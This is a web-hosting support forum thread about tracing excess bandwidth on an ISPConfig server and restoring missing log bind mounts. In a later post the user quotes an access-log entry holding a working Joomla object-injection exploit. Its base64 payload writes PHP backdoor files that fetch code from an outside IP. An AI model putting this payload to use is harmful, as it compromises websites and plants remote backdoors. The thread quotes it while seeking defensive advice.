Too much Bandwidth used. Web Traffic monitor - NAN

Discussion in 'ISPConfig 3 Priority Support' started by pawan, Jan 1, 2017.

  1. pawan

    pawan Member HowtoForge Supporter

    Hi, Last month I exceed my quota of Bandwidth by my ISP.
    Though all my websites are low traffic. But when tried to check the traffic status I found that for websites it is showing NAN.
    So I am unable to find the source of the problem.
    Please suggest the steps to find out the problem.
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Maybe the BIND mount is missing for the website log directory. Can you see the access.log with current data inside in the log folder of the affected website?
     
  3. pawan

    pawan Member HowtoForge Supporter

    Till
    Yes I can see the access logs for the current date for almost all websites.
     
  4. pawan

    pawan Member HowtoForge Supporter

    Hi till
    Any solution on this?
    while running nethogs I find maxium process under www-data. is it normal?
    Code:
     ? root     192.168.0.10:80-178.162.199.39:52331
    is above line in nethogs looks ok
     
    Last edited: Jan 2, 2017
  5. till

    till Super Moderator Staff Member ISPConfig Developer

    Is it showing NAN for all websites or just for this one?

    I don't know a software named maxium, it does not belong to ISPConfig.
     
  6. pawan

    pawan Member HowtoForge Supporter

    NAN for most websites, not all.
    No the software is nethogs. The maximum process shown there www-data.
     
  7. till

    till Super Moderator Staff Member ISPConfig Developer

    If the access logs are there in /var/www/domain.tld/log/ for the sites that shows NAN, then I don't know why it can not count the traffic for them.
     
  8. pawan

    pawan Member HowtoForge Supporter

    Sorry Till, I was checking this in var/log/ispconfig/httpd/domain.tld/
    and it is showing there alright. but log file/symlink is missing in the path - /var/www/domain.tld/log/
    How I can restore that?
     
  9. till

    till Super Moderator Staff Member ISPConfig Developer

    Create the missing bind mount line in /etc/fstab (check out the other bind mounts for the exact syntax) and then run "mount -a" to activate it.
     
  10. pawan

    pawan Member HowtoForge Supporter

    I have created all the entries in the /etc/fstab.
    when running "sudo mount -a" I am getting
    Code:
    mount: mount point var/www/clients/client22/web35/log does not exist
     
  11. till

    till Super Moderator Staff Member ISPConfig Developer

    Did you miss to add a / at the beginning of the /var/.... path?
     
  12. pawan

    pawan Member HowtoForge Supporter

    Yup. You are absolutely right. for that particular line I missed the /.
    Thank you Now mount command doesn't raise any error.
    The traffic meter will be updated at midnight I think?
     
  13. till

    till Super Moderator Staff Member ISPConfig Developer

    Yes.
     
  14. pawan

    pawan Member HowtoForge Supporter

    Thanks, it will enable me to trace where that Internet usage is being gulped in huge amount.
     
  15. pawan

    pawan Member HowtoForge Supporter

    Hi Till
    This type of code I find in access.log of one vhost file, there may be other.
    Can you suggest some steps to prevent it.
    Code:
    212.227.11.117 - - [03/Jan/2017:20:17:17 +0530] "GET / HTTP/1.1" 200 0 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3918:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSnVJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOWpjM011ZEhoMEp5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW0xaGFXd3VjR2h3SWlBN0RRb2tkR1Y0ZERJZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOXRMblI0ZENjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkzTG1oMGJTSWdPdzBLSkhSbGVIUXpJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTh5TVRJdU1qSTNMakV4TGpFeE55OW5aWFF2ZHk1MGVIUW5LVHNOQ2lSdmNETTlabTl3Wlc0b0pHTm9aV05yTXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNBekxDUjBaWGgwTXlrN0RRcG1ZMnh2YzJVb0pHOXdNeWs3RFFvTkNpUmphR1ZqYXpROUpGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFNBdUlDSXZiR2xpY21GeWFXVnpMMnB2YjIxc1lTOWphR1ZqYXk1d2FIQWlJRHNOQ2lSMFpYaDBOQ0E5SUdoMGRIQmZaMlYwS0Nkb2RIUndPaTh2TWpFeUxqSXlOeTR4TVM0eE1UY3ZaMlYwTDJNdWRIaDBKeWs3RFFva2IzQTBQV1p2Y0dWdUtDUmphR1ZqYXpRc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d05Dd2tkR1Y0ZERRcE93MEtabU5zYjNObEtDUnZjRFFwT3cwS0RRb2tZMmhsWTJzMVBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMnhwWW5KaGNtbGxjeTlxYjI5dGJHRXZhbTFoYVd4ekxuQm9jQ0lnT3cwS0pIUmxlSFExSUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4eU1USXVNakkzTGpFeExqRXhOeTluWlhRdmJXMHVkSGgwSnlrN0RRb2tiM0ExUFdadmNHVnVLQ1JqYUdWamF6VXNJQ2QzSnlrN0RRcG1kM0pwZEdVb0pHOXdOU3drZEdWNGREVXBPdzBLWm1Oc2IzTmxLQ1J2Y0RVcE93MEtEUW9rWTJobFkyczJQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW5WelpYSXVjR2h3SWlBN0RRb2tkR1Y0ZERZZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOTFjMlZ5TG5SNGRDY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2cwS0pIUnZlaUE5SUNKalpXOXlaWEJzZVRFeE1rQm5iV0ZwYkM1amIyMHNaMkZpWW5rdVkyRnphRUI1WVc1a1pYZ3VZMjl0TEc1bGQzTm9aV3hzTVRkQVoyMWhhV3d1WTI5dExHTmhjbkp2Ykd4a1lYSnNhVzVuTURBeFFHZHRZV2xzTG1OdmJTSTdEUW9rYzNWaWFtVmpkQ0E5SUNkS2IyMGdlbnA2SUNjZ0xpQWtYMU5GVWxaRlVsc25VMFZTVmtWU1gwNUJUVVVuWFRzTkNpUm9aV0ZrWlhJZ1BTQW5abkp2YlRvZ1MyVnJhMkZwSUZObGJuTmxiaUE4ZG05dVVtVnBibWhsY25wTGJHRjFjMEJUWVdscmIzVnVZVWhwWW1rdVkyOXRQaWNnTGlBaVhISmNiaUk3RFFva2JXVnpjMkZuWlNBOUlDSlRhR1ZzYkhvZ09pQm9kSFJ3T2k4dklpQXVJQ1JmVTBWU1ZrVlNXeWRUUlZKV1JWSmZUa0ZOUlNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jRDkxSWlBdUlDSmNjbHh1SWlBdUlIQm9jRjkxYm1GdFpTZ3BJQzRnSWx4eVhHNGlPdzBLSkhObGJuUnRZV2xzSUQwZ1FHMWhhV3dvSkhSdmVpd2dKSE4xWW1wbFkzUXNJQ1J0WlhOellXZGxMQ0FrYUdWaFpHVnlLVHNOQ2cwS1FIVnViR2x1YXloZlgwWkpURVZmWHlrN0RRb05DZzBLUHo0PScpKTsNCmZjbG9zZSgkZnApOw=='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
    then in another vhost which is a joomla site, but the line is seeking for wordpress folder
    Code:
    185.50.25.7 - - [03/Jan/2017:02:21:20 +0530] "GET /wp-admin/network/system.php HTTP/1.1" 404 1364 "http://bluebellsschool.org/wp-admin/network/system.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
     
    Last edited: Jan 3, 2017
  16. till

    till Super Moderator Staff Member ISPConfig Developer

    1) You can e.g. use th apache mod_security module to sanitize URL's and block access.
    2) That's harmless, just ignore it.
     

Share This Page